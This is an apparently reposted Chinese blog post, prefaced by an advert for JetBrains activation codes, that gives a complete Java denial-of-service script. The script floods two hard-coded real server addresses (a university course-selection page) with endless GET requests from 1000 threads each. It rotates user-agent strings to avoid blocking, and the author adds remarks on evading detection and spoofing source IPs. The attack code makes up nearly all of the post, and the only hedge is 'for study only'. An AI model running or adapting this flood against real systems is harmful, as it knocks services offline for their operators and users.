大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
dos攻击:拒绝服务攻击
具体的原理不再多说
我这里是java实现的
推荐使用python做这种脚本,不要用java
我写的仅供参考学习,请勿做坏事
package dos;
import java.net.httpurlconnection;
import java.net.url;
import java.net.urlconnection;
import java.util.arraylist;
import java.util.random;
import java.util.concurrent.executorservice;
import java.util.concurrent.executors;
/**
* dos攻击
*
* @author q
*
*/
public class test {
/**
* 输入开启的线程数量
*/
private static final int max_thread = 1000;
/**
* 输入你想攻击的网址
*/
private static final string url1 = “http://202.206.208.35:7777/zhxt_bks/zhxt_bks.html”;
private static final string url2 = “http://202.206.208.84:7777/zhxt_bks/zhxt_bks.html”;
private static arraylist useragentslist;
public static void main(string[] args) {
useragentslist = new arraylist();
insertuseragent();
attack(url1);
attack(url2);
}
/**
* get请求攻击
*/
private static void attack(string url) {
executorservice ex = executors.newfixedthreadpool(max_thread);
for (int i = 0; i < max_thread; i++) {
ex.execute(new thread() {
@override
public void run() {
while (true) {
sendget(url);
}
}
});
}
}
private static void sendget(string url) {
try {
url url = new url(url);
urlconnection connection = url.openconnection();
httpurlconnection httpurlconnection = (httpurlconnection) connection;
httpurlconnection.setrequestmethod(“get”);
httpurlconnection.setrequestproperty(“connection”, “keep-alive”);
httpurlconnection.setrequestproperty(“cache-control”, “max-age=0”);
httpurlconnection.setrequestproperty(“upgrade-insecure-requests”, “1”);
httpurlconnection.setrequestproperty(“accept-charset”, “zh-cn,zh;q=0.9”);
httpurlconnection.setrequestproperty(“content-type”, “application/text”);
httpurlconnection.setrequestproperty(“user-agent”, selectuseragent());
httpurlconnection.connect();
int code = httpurlconnection.getresponsecode();
if (httpurlconnection.getresponsecode() >= 300) {
throw new exception(“request is not success, response code is ” + code);
} else {
system.out.println(“request is success, response code is ” + code);
}
} catch (exception e) {
}
}
private static string selectuseragent() {
random random = new random();
int i = random.nextint(useragentslist.size());
return useragentslist.get(i);
}
private static void insertuseragent() {
useragentslist
.add(“mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/39.0.2171.95”);
useragentslist.add(“mozilla/5.0 (windows nt 5.1; u; en; rv:1.8.1) gecko/20061208 firefox/2.0.0 opera 9.50”);
useragentslist.add(
“mozilla/5.0 (x11; u; linux x86_64; zh-cn; rv:1.9.2.10) gecko/20100922 ubuntu/10.10 (maverick) firefox/3.6.10”);
useragentslist
.add(“mozilla/5.0 (windows nt 6.1; wow64) applewebkit/534.57.2 (khtml, like gecko) version/5.1.7”);
useragentslist
.add(“mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/39.0.2171.71”);
useragentslist.add(“mozilla/5.0 (windows; u; windows nt 6.1; en-us) applewebkit/534.16 (khtml, like gecko)”);
useragentslist
.add(“mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/30.0.1599.101”);
useragentslist
.add(“mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.1 (khtml, like gecko) chrome/21.0.1180.71”);
useragentslist
.add(“mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; qqdownload 732; .net4.0c; .net4.0e)”);
useragentslist.add(
“mozilla/5.0 (linux; u; android 2.2.1; zh-cn; htc_wildfire_a3333 build/frg83d) applewebkit/533.1 (khtml, like gecko) version/4.0 mobile safari/533.1”);
useragentslist.add(
“opera/9.80 (android 2.3.4; linux; opera mobi/build-1107180945; u; en-gb) presto/2.8.149 version/11.10”);
useragentslist.add(
“mozilla/5.0 (hp-tablet; linux; hpwos/3.0.0; u; en-us) applewebkit/534.6 (khtml, like gecko) wosbrowser/233.70 safari/534.6 touchpad/1.0”);
useragentslist
.add(“mozilla/5.0 (compatible; msie 9.0; windows phone os 7.5; trident/5.0; iemobile/9.0; htc; titan)”);
useragentslist.add(
“mozilla/5.0 (ipad; u; cpu os 4_2_1 like mac os x; zh-cn) applewebkit/533.17.9 (khtml, like gecko) version/5.0.2 mobile/8c148 safari/6533.18.5”);
useragentslist.add(“applewebkit/533.1 (khtml, like gecko) version/4.0 mobile safari/533.1”);
}
}
注意事项:
我虽然用user-agent列表来混淆对方,这样从一定程度上可以防止被封
但是这不是伪造源ip的方式
只要对方下定决心来查你,怎么样你都会被查到
不过,我想到另一种思路,从数据包的层次修改源ip地址,这样的结果是收不到回包,不过可以做到攻击效果
以后有空试一试,或者直接用kali里面的工具
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/188692.html原文链接:https://javaforall.net
![Linux下 解决Tomcat8不自动解压war包[通俗易懂]](https://javaforall.net/wp-content/uploads/2020/11/2020110817443450-480x300.jpg)
